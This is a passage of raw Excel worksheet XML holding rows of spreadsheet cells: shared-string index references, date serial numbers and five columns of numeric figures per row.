      <c r="N133" t="s">
        <v>522</v>
      </c>
      <c r="Q133" t="s">
        <v>3538</v>
      </c>
      <c r="R133">
        <v>9330</v>
      </c>
      <c r="S133">
        <v>16286</v>
      </c>
      <c r="T133">
        <v>18003</v>
      </c>
      <c r="U133">
        <v>22346</v>
      </c>
      <c r="V133">
        <v>52757</v>
      </c>
      <c r="W133" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="134" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A134" t="s">
        <v>4</v>
      </c>
      <c r="B134">
        <v>44069.67221527778</v>
      </c>
      <c r="C134" t="s">
        <v>1451</v>
      </c>
      <c r="D134">
        <v>205</v>
      </c>
      <c r="E134" t="s">
        <v>1452</v>
      </c>
      <c r="F134">
        <v>205</v>
      </c>
      <c r="G134" t="s">
        <v>1453</v>
      </c>
      <c r="H134" t="s">
        <v>1454</v>
      </c>
      <c r="I134" t="s">
        <v>172</v>
      </c>
      <c r="J134" t="s">
        <v>173</v>
      </c>
      <c r="K134" t="s">
        <v>13</v>
      </c>
      <c r="L134" t="s">
        <v>83</v>
      </c>
      <c r="M134" t="s">
        <v>72</v>
      </c>
      <c r="N134" t="s">
        <v>522</v>
      </c>
      <c r="O134" t="s">
        <v>111</v>
      </c>
      <c r="Q134" t="s">
        <v>3539</v>
      </c>
      <c r="R134">
        <v>9330</v>
      </c>
      <c r="S134">
        <v>16286</v>
      </c>
      <c r="T134">
        <v>18003</v>
      </c>
      <c r="U134">
        <v>22346</v>
      </c>
      <c r="V134">
        <v>52757</v>
      </c>
      <c r="W134" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="135" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A135" t="s">
        <v>4</v>
      </c>
      <c r="B135">
        <v>44245.657708993058</v>
      </c>
      <c r="C135" t="s">
        <v>1457</v>
      </c>
      <c r="D135">
        <v>103</v>
      </c>
      <c r="E135" t="s">
        <v>1458</v>
      </c>
      <c r="F135">
        <v>101</v>
      </c>
      <c r="G135" t="s">
        <v>1459</v>
      </c>
      <c r="H135" t="s">
        <v>1460</v>
      </c>
      <c r="I135" t="s">
        <v>268</v>
      </c>
      <c r="J135" t="s">
        <v>566</v>
      </c>
      <c r="K135" t="s">
        <v>40</v>
      </c>
      <c r="L135" t="s">
        <v>83</v>
      </c>
      <c r="N135" t="s">
        <v>1320</v>
      </c>
      <c r="O135" t="s">
        <v>1461</v>
      </c>
      <c r="Q135" t="s">
        <v>3540</v>
      </c>
      <c r="R135">
        <v>391</v>
      </c>
      <c r="S135">
        <v>114</v>
      </c>
      <c r="T135">
        <v>91</v>
      </c>
      <c r="U135">
        <v>1588</v>
      </c>
      <c r="V135">
        <v>1722</v>
      </c>
      <c r="W135" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="136" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A136" t="s">
        <v>4</v>
      </c>
      <c r="B136">
        <v>44113.635730624999</v>
      </c>
      <c r="C136" t="s">
        <v>1463</v>
      </c>
      <c r="D136">
        <v>200</v>
      </c>
      <c r="E136" t="s">
        <v>1458</v>
      </c>
      <c r="F136">
        <v>200</v>
      </c>
      <c r="G136" t="s">
        <v>1459</v>
      </c>
      <c r="H136" t="s">
        <v>1460</v>
      </c>
      <c r="I136" t="s">
        <v>268</v>
      </c>
      <c r="J136" t="s">
        <v>566</v>
      </c>
      <c r="K136" t="s">
        <v>40</v>
      </c>
      <c r="L136" t="s">
        <v>83</v>
      </c>
      <c r="N136" t="s">
        <v>1320</v>
      </c>
      <c r="O136" t="s">
        <v>1461</v>
      </c>
      <c r="Q136" t="s">
        <v>3541</v>
      </c>
      <c r="R136">
        <v>391</v>
      </c>
      <c r="S136">
        <v>114</v>
      </c>
      <c r="T136">
        <v>91</v>
      </c>
      <c r="U136">
        <v>1588</v>
      </c>
      <c r="V136">
        <v>1722</v>
      </c>
      <c r="W136" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="137" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A137" t="s">
        <v>4</v>
      </c>
      <c r="B137">
        <v>44335.700018090276</v>
      </c>
      <c r="C137" t="s">
        <v>1465</v>
      </c>
      <c r="D137">
        <v>101</v>
      </c>
      <c r="E137" t="s">
        <v>1466</v>
      </c>
      <c r="F137">
        <v>101</v>
      </c>
      <c r="G137" t="s">
        <v>1467</v>
      </c>
      <c r="H137" t="s">
        <v>1468</v>
      </c>
      <c r="I137" t="s">
        <v>268</v>
      </c>
      <c r="J137" t="s">
        <v>566</v>
      </c>
      <c r="K137" t="s">
        <v>12</v>
      </c>
      <c r="L137" t="s">
        <v>77</v>
      </c>
      <c r="M137" t="s">
        <v>622</v>
      </c>
      <c r="N137" t="s">
        <v>623</v>
      </c>
      <c r="Q137" t="s">
        <v>3542</v>
      </c>
      <c r="R137">
        <v>46259</v>
      </c>
      <c r="S137">
        <v>43849</v>
      </c>
      <c r="T137">
        <v>37500</v>
      </c>
      <c r="U137">
        <v>36910</v>
      </c>
      <c r="V137">
        <v>48779</v>
      </c>
      <c r="W137" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="138" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A138" t="s">
        <v>4</v>
      </c>
      <c r="B138">
        <v>44172.692372048608</v>
      </c>
      <c r="C138" t="s">
        <v>1457</v>
      </c>
      <c r="D138">
        <v>103</v>
      </c>
      <c r="E138" t="s">
        <v>1466</v>
      </c>
      <c r="F138">
        <v>102</v>
      </c>
      <c r="G138" t="s">
        <v>1467</v>
      </c>
      <c r="H138" t="s">
        <v>1468</v>
      </c>
      <c r="I138" t="s">
        <v>268</v>
      </c>
      <c r="J138" t="s">
        <v>566</v>
      </c>
      <c r="K138" t="s">
        <v>12</v>
      </c>
      <c r="L138" t="s">
        <v>77</v>
      </c>
      <c r="M138" t="s">
        <v>622</v>
      </c>
      <c r="N138" t="s">
        <v>623</v>
      </c>
      <c r="Q138" t="s">
        <v>3543</v>
      </c>
      <c r="R138">
        <v>46259</v>
      </c>
      <c r="S138">
        <v>43849</v>
      </c>
      <c r="T138">
        <v>37500</v>
      </c>
      <c r="U138">
        <v>36910</v>
      </c>
      <c r="V138">
        <v>48779</v>
      </c>
      <c r="W138" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="139" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A139" t="s">
        <v>4</v>
      </c>
      <c r="B139">
        <v>44335.700018101852</v>
      </c>
      <c r="C139" t="s">
        <v>1465</v>
      </c>
      <c r="D139">
        <v>103</v>
      </c>
      <c r="E139" t="s">
        <v>1471</v>
      </c>
      <c r="F139">
        <v>103</v>
      </c>
      <c r="G139" t="s">
        <v>1472</v>
      </c>
      <c r="H139" t="s">
        <v>1473</v>
      </c>
      <c r="I139" t="s">
        <v>268</v>
      </c>
      <c r="J139" t="s">
        <v>566</v>
      </c>
      <c r="K139" t="s">
        <v>12</v>
      </c>
      <c r="L139" t="s">
        <v>77</v>
      </c>
      <c r="M139" t="s">
        <v>622</v>
      </c>
      <c r="N139" t="s">
        <v>623</v>
      </c>
      <c r="Q139" t="s">
        <v>3543</v>
      </c>
      <c r="R139">
        <v>46404</v>
      </c>
      <c r="S139">
        <v>45021</v>
      </c>
      <c r="T139">
        <v>39019</v>
      </c>
      <c r="U139">
        <v>37089</v>
      </c>
      <c r="V139">
        <v>48918</v>
      </c>
      <c r="W139" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="140" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A140" t="s">
        <v>4</v>
      </c>
      <c r="B140">
        <v>44314.65871935185</v>
      </c>
      <c r="C140" t="s">
        <v>1463</v>
      </c>
      <c r="D140">
        <v>103</v>
      </c>
      <c r="E140" t="s">
        <v>1474</v>
      </c>
      <c r="F140">
        <v>111</v>
      </c>
      <c r="G140" t="s">
        <v>1475</v>
      </c>
      <c r="H140" t="s">
        <v>1476</v>
      </c>
      <c r="I140" t="s">
        <v>268</v>
      </c>
      <c r="J140" t="s">
        <v>566</v>
      </c>
      <c r="K140" t="s">
        <v>10</v>
      </c>
      <c r="L140" t="s">
        <v>77</v>
      </c>
      <c r="M140" t="s">
        <v>290</v>
      </c>
      <c r="N140" t="s">
        <v>291</v>
      </c>
      <c r="O140" t="s">
        <v>1477</v>
      </c>
      <c r="P140" t="s">
        <v>567</v>
      </c>
      <c r="Q140" t="s">
        <v>3540</v>
      </c>
      <c r="R140">
        <v>4</v>
      </c>
      <c r="S140">
        <v>1036</v>
      </c>
      <c r="T140">
        <v>18729</v>
      </c>
      <c r="U140">
        <v>19696</v>
      </c>
      <c r="V140">
        <v>28966</v>
      </c>
      <c r="W140" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="141" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A141" t="s">
        <v>4</v>
      </c>
      <c r="B141">
        <v>44085.746830324075</v>
      </c>
      <c r="C141" t="s">
        <v>1478</v>
      </c>
      <c r="D141">
        <v>101</v>
      </c>
      <c r="E141" t="s">
        <v>1479</v>
      </c>
      <c r="F141">
        <v>101</v>
      </c>
      <c r="G141" t="s">
        <v>1480</v>
      </c>
      <c r="H141" t="s">
        <v>1481</v>
      </c>
      <c r="I141" t="s">
        <v>268</v>
      </c>
      <c r="J141" t="s">
        <v>269</v>
      </c>
      <c r="K141" t="s">
        <v>10</v>
      </c>
      <c r="L141" t="s">
        <v>77</v>
      </c>
      <c r="M141" t="s">
        <v>290</v>
      </c>
      <c r="N141" t="s">
        <v>291</v>
      </c>
      <c r="Q141" t="s">
        <v>1482</v>
      </c>
      <c r="R141">
        <v>460</v>
      </c>
      <c r="S141">
        <v>303</v>
      </c>
      <c r="T141">
        <v>292</v>
      </c>
      <c r="U141">
        <v>817</v>
      </c>
      <c r="V141">
        <v>636</v>
      </c>
      <c r="W141" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="142" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A142" t="s">
        <v>4</v>
      </c>
      <c r="B142">
        <v>44489.987387673609</v>
      </c>
      <c r="C142" t="s">
        <v>1478</v>
      </c>
      <c r="D142">
        <v>205</v>
      </c>
      <c r="E142" t="s">
        <v>1479</v>
      </c>
      <c r="F142">
        <v>202</v>
      </c>
      <c r="G142" t="s">
        <v>1480</v>
      </c>
      <c r="H142" t="s">
        <v>1483</v>
      </c>
      <c r="I142" t="s">
        <v>268</v>
      </c>
      <c r="J142" t="s">
        <v>269</v>
      </c>
      <c r="K142" t="s">
        <v>10</v>
      </c>
      <c r="L142" t="s">
        <v>77</v>
      </c>
      <c r="M142" t="s">
        <v>290</v>
      </c>
      <c r="N142" t="s">
        <v>291</v>
      </c>
      <c r="Q142" t="s">
        <v>3544</v>
      </c>
      <c r="R142">
        <v>460</v>
      </c>
      <c r="S142">
        <v>303</v>
      </c>
      <c r="T142">
        <v>292</v>
      </c>
      <c r="U142">
        <v>817</v>
      </c>
      <c r="V142">
        <v>636</v>
      </c>
      <c r="W142" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="143" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A143" t="s">
        <v>4</v>
      </c>
      <c r="B143">
        <v>44489.987387673609</v>
      </c>
      <c r="C143" t="s">
        <v>1478</v>
      </c>
      <c r="D143">
        <v>300</v>
      </c>
      <c r="E143" t="s">
        <v>1479</v>
      </c>
      <c r="F143">
        <v>300</v>
      </c>
      <c r="G143" t="s">
        <v>1480</v>
      </c>
      <c r="H143" t="s">
        <v>1483</v>
      </c>
      <c r="I143" t="s">
        <v>268</v>
      </c>
      <c r="J143" t="s">
        <v>269</v>
      </c>
      <c r="K143" t="s">
        <v>10</v>
      </c>
      <c r="L143" t="s">
        <v>77</v>
      </c>
      <c r="M143" t="s">
        <v>290</v>
      </c>
      <c r="N143" t="s">
        <v>291</v>
      </c>
      <c r="O143" t="s">
        <v>111</v>
      </c>
      <c r="Q143" t="s">
        <v>3545</v>
      </c>
      <c r="R143">
        <v>460</v>
      </c>
      <c r="S143">
        <v>303</v>
      </c>
      <c r="T143">
        <v>292</v>
      </c>
      <c r="U143">
        <v>817</v>
      </c>
      <c r="V143">
        <v>636</v>
      </c>
      <c r="W143" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="144" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A144" t="s">
        <v>4</v>
      </c>
      <c r="B144">
        <v>44085.746830312499</v>
      </c>
      <c r="C144" t="s">
        <v>1478</v>
      </c>
      <c r="D144">
        <v>101</v>
      </c>
      <c r="E144" t="s">
        <v>1486</v>
      </c>
      <c r="F144">
        <v>101</v>
      </c>
      <c r="G144" t="s">
        <v>1487</v>
      </c>
      <c r="H144" t="s">
        <v>1488</v>
      </c>
      <c r="I144" t="s">
        <v>268</v>
      </c>
      <c r="J144" t="s">
        <v>269</v>
      </c>
      <c r="K144" t="s">
        <v>10</v>
      </c>
      <c r="L144" t="s">
        <v>77</v>
      </c>
      <c r="M144" t="s">
        <v>290</v>
      </c>
      <c r="N144" t="s">
        <v>291</v>
      </c>
      <c r="Q144" t="s">
        <v>1482</v>
      </c>
      <c r="R144">
        <v>35557207</v>
      </c>
      <c r="S144">
        <v>30989380</v>
      </c>
      <c r="T144">
        <v>34232079</v>
      </c>
      <c r="U144">
        <v>29950100</v>
      </c>
      <c r="V144">
        <v>36910813</v>
      </c>
      <c r="W144" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="145" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A145" t="s">
        <v>4</v>
      </c>
      <c r="B145">
        <v>44489.98738766204</v>
      </c>
      <c r="C145" t="s">
        <v>1478</v>
      </c>
      <c r="D145">
        <v>205</v>
      </c>
      <c r="E145" t="s">
        <v>1486</v>
      </c>
      <c r="F145">
        <v>205</v>
      </c>
      <c r="G145" t="s">
        <v>1487</v>
      </c>
      <c r="H145" t="s">
        <v>1488</v>
      </c>
      <c r="I145" t="s">
        <v>268</v>
      </c>
      <c r="J145" t="s">
        <v>269</v>
      </c>
      <c r="K145" t="s">
        <v>10</v>
      </c>
      <c r="L145" t="s">
        <v>77</v>
      </c>
      <c r="M145" t="s">
        <v>290</v>
      </c>
      <c r="N145" t="s">
        <v>291</v>
      </c>
      <c r="Q145" t="s">
        <v>3544</v>
      </c>
      <c r="R145">
        <v>35557207</v>
      </c>
      <c r="S145">
        <v>30989380</v>
      </c>
      <c r="T145">
        <v>34232079</v>
      </c>
      <c r="U145">
        <v>29950100</v>
      </c>
      <c r="V145">
        <v>36910813</v>
      </c>
      <c r="W145" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="146" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A146" t="s">
        <v>4</v>
      </c>
      <c r="B146">
        <v>44489.98738766204</v>
      </c>
      <c r="C146" t="s">
        <v>1478</v>
      </c>
      <c r="D146">
        <v>300</v>
      </c>
      <c r="E146" t="s">
        <v>1486</v>
      </c>
      <c r="F146">
        <v>300</v>
      </c>
      <c r="G146" t="s">
        <v>1487</v>
      </c>
      <c r="H146" t="s">
        <v>1488</v>
      </c>
      <c r="I146" t="s">
        <v>268</v>
      </c>
      <c r="J146" t="s">
        <v>269</v>
      </c>
      <c r="K146" t="s">
        <v>10</v>
      </c>
      <c r="L146" t="s">
        <v>77</v>
      </c>
      <c r="M146" t="s">
        <v>290</v>
      </c>
      <c r="N146" t="s">
        <v>291</v>
      </c>
      <c r="O146" t="s">
        <v>111</v>
      </c>
      <c r="Q146" t="s">
        <v>3545</v>
      </c>
      <c r="R146">
        <v>35557207</v>
      </c>
      <c r="S146">
        <v>30989380</v>
      </c>
      <c r="T146">
        <v>34232079</v>
      </c>
      <c r="U146">
        <v>29950100</v>
      </c>
      <c r="V146">
        <v>36910813</v>
      </c>
      <c r="W146" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="147" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A147" t="s">
        <v>4</v>
      </c>
      <c r="B147">
        <v>44033.617680509262</v>
      </c>
      <c r="C147" t="s">
        <v>1489</v>
      </c>
      <c r="D147">
        <v>110</v>
      </c>
      <c r="E147" t="s">
        <v>1490</v>
      </c>
      <c r="F147">
        <v>100</v>
      </c>
      <c r="G147" t="s">
        <v>1491</v>
      </c>
      <c r="H147" t="s">
        <v>1492</v>
      </c>
      <c r="I147" t="s">
        <v>31</v>
      </c>
      <c r="J147" t="s">
        <v>262</v>
      </c>
      <c r="K147" t="s">
        <v>31</v>
      </c>
      <c r="L147" t="s">
        <v>77</v>
      </c>
      <c r="M147" t="s">
        <v>262</v>
      </c>
      <c r="N147" t="s">
        <v>263</v>
      </c>
      <c r="Q147" t="s">
        <v>1493</v>
      </c>
      <c r="U147">
        <v>2</v>
      </c>
      <c r="V147">
        <v>5</v>
      </c>
      <c r="W147" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="148" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A148" t="s">
        <v>4</v>
      </c>
      <c r="B148">
        <v>44489.686027048614</v>
      </c>
      <c r="C148" t="s">
        <v>1494</v>
      </c>
      <c r="D148">
        <v>100</v>
      </c>
      <c r="E148" t="s">
        <v>1495</v>
      </c>
      <c r="F148">
        <v>100</v>
      </c>
      <c r="G148" t="s">
        <v>1496</v>
      </c>
      <c r="H148" t="s">
        <v>1497</v>
      </c>
      <c r="I148" t="s">
        <v>172</v>
      </c>
      <c r="J148" t="s">
        <v>173</v>
      </c>
      <c r="K148" t="s">
        <v>13</v>
      </c>
      <c r="L148" t="s">
        <v>83</v>
      </c>
      <c r="M148" t="s">
        <v>72</v>
      </c>
      <c r="N148" t="s">
        <v>522</v>
      </c>
      <c r="Q148" t="s">
        <v>523</v>
      </c>
      <c r="R148">
        <v>24</v>
      </c>
      <c r="S148">
        <v>32</v>
      </c>
      <c r="T148">
        <v>27</v>
      </c>
      <c r="U148">
        <v>25</v>
      </c>
      <c r="V148">
        <v>89</v>
      </c>
      <c r="W148" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="149" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A149" t="s">
        <v>4</v>
      </c>
      <c r="B149">
        <v>44504.903723078707</v>
      </c>
      <c r="C149" t="s">
        <v>1502</v>
      </c>
      <c r="D149">
        <v>1115</v>
      </c>
      <c r="E149" t="s">
        <v>1503</v>
      </c>
      <c r="F149">
        <v>109</v>
      </c>
      <c r="G149" t="s">
        <v>1504</v>
      </c>
      <c r="H149" t="s">
        <v>1505</v>
      </c>
      <c r="I149" t="s">
        <v>156</v>
      </c>
      <c r="J149" t="s">
        <v>438</v>
      </c>
      <c r="K149" t="s">
        <v>27</v>
      </c>
      <c r="L149" t="s">
        <v>77</v>
      </c>
      <c r="M149" t="s">
        <v>509</v>
      </c>
      <c r="N149" t="s">
        <v>510</v>
      </c>
      <c r="O149" t="s">
        <v>1506</v>
      </c>
      <c r="Q149" t="s">
        <v>3546</v>
      </c>
      <c r="R149">
        <v>2979</v>
      </c>
      <c r="S149">
        <v>2784</v>
      </c>
      <c r="T149">
        <v>2427</v>
      </c>
      <c r="U149">
        <v>2131</v>
      </c>
      <c r="V149">
        <v>2366</v>
      </c>
      <c r="W149" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="150" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A150" t="s">
        <v>4</v>
      </c>
      <c r="B150">
        <v>44524.712880925923</v>
      </c>
      <c r="C150" t="s">
        <v>1502</v>
      </c>
      <c r="D150">
        <v>1115</v>
      </c>
      <c r="E150" t="s">
        <v>1508</v>
      </c>
      <c r="F150">
        <v>118</v>
      </c>
      <c r="G150" t="s">
        <v>1509</v>
      </c>
      <c r="H150" t="s">
        <v>1510</v>
      </c>
      <c r="I150" t="s">
        <v>156</v>
      </c>
      <c r="J150" t="s">
        <v>438</v>
      </c>
      <c r="K150" t="s">
        <v>27</v>
      </c>
      <c r="L150" t="s">
        <v>77</v>
      </c>
      <c r="M150" t="s">
        <v>509</v>
      </c>
      <c r="N150" t="s">
        <v>510</v>
      </c>
      <c r="Q150" t="s">
        <v>3546</v>
      </c>
      <c r="R150">
        <v>2988425</v>
      </c>
      <c r="S150">
        <v>2847085</v>
      </c>
      <c r="T150">
        <v>2758550</v>
      </c>
      <c r="U150">
        <v>2702883</v>
      </c>
      <c r="V150">
        <v>3044197</v>
      </c>
      <c r="W150" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="151" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A151" t="s">
        <v>4</v>
      </c>
      <c r="B151">
        <v>44406.751182349537</v>
      </c>
      <c r="C151" t="s">
        <v>1502</v>
      </c>
      <c r="D151">
        <v>1115</v>
      </c>
      <c r="E151" t="s">
        <v>1511</v>
      </c>
      <c r="F151">
        <v>109</v>
      </c>
      <c r="G151" t="s">
        <v>1512</v>
      </c>
      <c r="H151" t="s">
        <v>1513</v>
      </c>
      <c r="I151" t="s">
        <v>156</v>
      </c>
      <c r="J151" t="s">
        <v>438</v>
      </c>
      <c r="K151" t="s">
        <v>27</v>
      </c>
      <c r="L151" t="s">
        <v>77</v>
      </c>
      <c r="M151" t="s">
        <v>509</v>
      </c>
      <c r="N151" t="s">
        <v>510</v>
      </c>
      <c r="Q151" t="s">
        <v>3546</v>
      </c>
      <c r="R151">
        <v>110726</v>
      </c>
      <c r="S151">
        <v>123853</v>
      </c>
      <c r="T151">
        <v>102481</v>
      </c>
      <c r="U151">
        <v>115036</v>
      </c>
      <c r="V151">
        <v>122307</v>
      </c>
      <c r="W151" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="152" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A152" t="s">
        <v>4</v>
      </c>
      <c r="B152">
        <v>44525.73112019676</v>
      </c>
      <c r="C152" t="s">
        <v>1502</v>
      </c>
      <c r="D152">
        <v>1115</v>
      </c>
      <c r="E152" t="s">
        <v>1514</v>
      </c>
      <c r="F152">
        <v>1012</v>
      </c>
      <c r="G152" t="s">
        <v>1515</v>
      </c>
      <c r="H152" t="s">
        <v>1516</v>
      </c>
      <c r="I152" t="s">
        <v>156</v>
      </c>
      <c r="J152" t="s">
        <v>438</v>
      </c>
      <c r="K152" t="s">
        <v>27</v>
      </c>
      <c r="L152" t="s">
        <v>77</v>
      </c>
      <c r="M152" t="s">
        <v>509</v>
      </c>
      <c r="N152" t="s">
        <v>510</v>
      </c>
      <c r="O152" t="s">
        <v>1517</v>
      </c>
      <c r="Q152" t="s">
        <v>3546</v>
      </c>
      <c r="R152">
        <v>12165</v>
      </c>
      <c r="S152">
        <v>13378</v>
      </c>
      <c r="T152">
        <v>18385</v>
      </c>
      <c r="U152">
        <v>17411</v>
      </c>
      <c r="V152">
        <v>21476</v>
      </c>
      <c r="W152" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="153" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A153" t="s">
        <v>4</v>
      </c>
      <c r="B153">
        <v>44504.903723043979</v>
      </c>
      <c r="C153" t="s">
        <v>1502</v>
      </c>
      <c r="D153">
        <v>1115</v>
      </c>
      <c r="E153" t="s">
        <v>1518</v>
      </c>
      <c r="F153">
        <v>103</v>
      </c>
      <c r="G153" t="s">
        <v>1519</v>
      </c>
      <c r="H153" t="s">
        <v>1520</v>
      </c>
      <c r="I153" t="s">
        <v>156</v>
      </c>
      <c r="J153" t="s">
        <v>438</v>
      </c>
      <c r="K153" t="s">
        <v>27</v>
      </c>
      <c r="L153" t="s">
        <v>77</v>
      </c>
      <c r="M153" t="s">
        <v>509</v>
      </c>
      <c r="N153" t="s">
        <v>510</v>
      </c>
      <c r="Q153" t="s">
        <v>3546</v>
      </c>
      <c r="R153">
        <v>812</v>
      </c>
      <c r="S153">
        <v>5734</v>
      </c>
      <c r="T153">
        <v>1540</v>
      </c>
      <c r="U153">
        <v>2081</v>
      </c>
      <c r="V153">
        <v>15679</v>
      </c>
      <c r="W153" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="154" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A154" t="s">
        <v>4</v>
      </c>
      <c r="B154">
        <v>44622.698677766202</v>
      </c>
      <c r="C154" t="s">
        <v>1521</v>
      </c>
      <c r="D154">
        <v>101</v>
      </c>
      <c r="E154" t="s">
        <v>1522</v>
      </c>
      <c r="F154">
        <v>101</v>
      </c>
      <c r="G154" t="s">
        <v>1523</v>
      </c>
      <c r="H154" t="s">
        <v>1524</v>
      </c>
      <c r="I154" t="s">
        <v>156</v>
      </c>
      <c r="J154" t="s">
        <v>438</v>
      </c>
      <c r="K154" t="s">
        <v>27</v>
      </c>
      <c r="L154" t="s">
        <v>77</v>
      </c>
      <c r="M154" t="s">
        <v>509</v>
      </c>
      <c r="N154" t="s">
        <v>510</v>
      </c>
      <c r="O154" t="s">
        <v>1525</v>
      </c>
      <c r="Q154" t="s">
        <v>3547</v>
      </c>
      <c r="R154">
        <v>257824</v>
      </c>
      <c r="S154">
        <v>232178</v>
      </c>
      <c r="T154">
        <v>197494</v>
      </c>
      <c r="U154">
        <v>155211</v>
      </c>
      <c r="V154">
        <v>158834</v>
      </c>
      <c r="W154" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="155" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A155" t="s">
        <v>4</v>
      </c>
      <c r="B155">
        <v>44504.903723020834</v>
      </c>
      <c r="C155" t="s">
        <v>1502</v>
      </c>
      <c r="D155">
        <v>1115</v>
      </c>
      <c r="E155" t="s">
        <v>1527</v>
      </c>
      <c r="F155">
        <v>105</v>
      </c>
      <c r="G155" t="s">
        <v>1528</v>
      </c>
      <c r="H155" t="s">
        <v>1529</v>
      </c>
      <c r="I155" t="s">
        <v>156</v>
      </c>
      <c r="J155" t="s">
        <v>301</v>
      </c>
      <c r="K155" t="s">
        <v>26</v>
      </c>
      <c r="L155" t="s">
        <v>77</v>
      </c>
      <c r="M155" t="s">
        <v>475</v>
      </c>
      <c r="N155" t="s">
        <v>476</v>
      </c>
      <c r="Q155" t="s">
        <v>3546</v>
      </c>
      <c r="R155">
        <v>24196</v>
      </c>
      <c r="S155">
        <v>22051</v>
      </c>
      <c r="T155">
        <v>22952</v>
      </c>
      <c r="U155">
        <v>19328</v>
      </c>
      <c r="V155">
        <v>22712</v>
      </c>
      <c r="W155" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="156" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A156" t="s">
        <v>4</v>
      </c>
      <c r="B156">
        <v>44105.684892442128</v>
      </c>
      <c r="C156" t="s">
        <v>1558</v>
      </c>
      <c r="D156">
        <v>103</v>
      </c>
      <c r="E156" t="s">
        <v>1559</v>
      </c>
      <c r="F156">
        <v>103</v>
      </c>
      <c r="G156" t="s">
        <v>1548</v>
      </c>
      <c r="H156" t="s">
        <v>1560</v>
      </c>
      <c r="I156" t="s">
        <v>75</v>
      </c>
      <c r="J156" t="s">
        <v>76</v>
      </c>
      <c r="K156" t="s">
        <v>15</v>
      </c>
      <c r="L156" t="s">
        <v>77</v>
      </c>
      <c r="M156" t="s">
        <v>90</v>
      </c>
      <c r="N156" t="s">
        <v>221</v>
      </c>
      <c r="O156" t="s">
        <v>1561</v>
      </c>
      <c r="P156" t="s">
        <v>222</v>
      </c>
      <c r="Q156" t="s">
        <v>3548</v>
      </c>
      <c r="R156">
        <v>735631</v>
      </c>
      <c r="S156">
        <v>669335</v>
      </c>
      <c r="T156">
        <v>665532</v>
      </c>
      <c r="U156">
        <v>594540</v>
      </c>
      <c r="V156">
        <v>744336</v>
      </c>
      <c r="W156" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="157" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A157" t="s">
        <v>4</v>
      </c>
      <c r="B157">
        <v>44180.61579708333</v>
      </c>
      <c r="C157" t="s">
        <v>1563</v>
      </c>
      <c r="D157">
        <v>102</v>
      </c>
      <c r="E157" t="s">
        <v>1564</v>
      </c>
      <c r="F157">
        <v>102</v>
      </c>
      <c r="G157" t="s">
        <v>1565</v>
      </c>
      <c r="H157" t="s">
        <v>1566</v>
      </c>
      <c r="I157" t="s">
        <v>75</v>
      </c>
      <c r="J157" t="s">
        <v>236</v>
      </c>
      <c r="K157" t="s">
        <v>15</v>
      </c>
      <c r="L157" t="s">
        <v>77</v>
      </c>
      <c r="M157" t="s">
        <v>90</v>
      </c>
      <c r="N157" t="s">
        <v>221</v>
      </c>
      <c r="O157" t="s">
        <v>1567</v>
      </c>
      <c r="Q157" t="s">
        <v>3549</v>
      </c>
      <c r="R157">
        <v>901</v>
      </c>
      <c r="S157">
        <v>815</v>
      </c>
      <c r="T157">
        <v>721</v>
      </c>
      <c r="U157">
        <v>703</v>
      </c>
      <c r="V157">
        <v>3070</v>
      </c>
      <c r="W157" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="158" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A158" t="s">
        <v>4</v>
      </c>
      <c r="B158">
        <v>44180.615797106482</v>
      </c>
      <c r="C158" t="s">
        <v>1563</v>
      </c>
      <c r="D158">
        <v>102</v>
      </c>
      <c r="E158" t="s">
        <v>1569</v>
      </c>
      <c r="F158">
        <v>102</v>
      </c>
      <c r="G158" t="s">
        <v>1570</v>
      </c>
      <c r="H158" t="s">
        <v>1571</v>
      </c>
      <c r="I158" t="s">
        <v>268</v>
      </c>
      <c r="J158" t="s">
        <v>1572</v>
      </c>
      <c r="K158" t="s">
        <v>33</v>
      </c>
      <c r="L158" t="s">
        <v>83</v>
      </c>
      <c r="M158" t="s">
        <v>72</v>
      </c>
      <c r="O158" t="s">
        <v>1573</v>
      </c>
      <c r="Q158" t="s">
        <v>3549</v>
      </c>
      <c r="R158">
        <v>901</v>
      </c>
      <c r="S158">
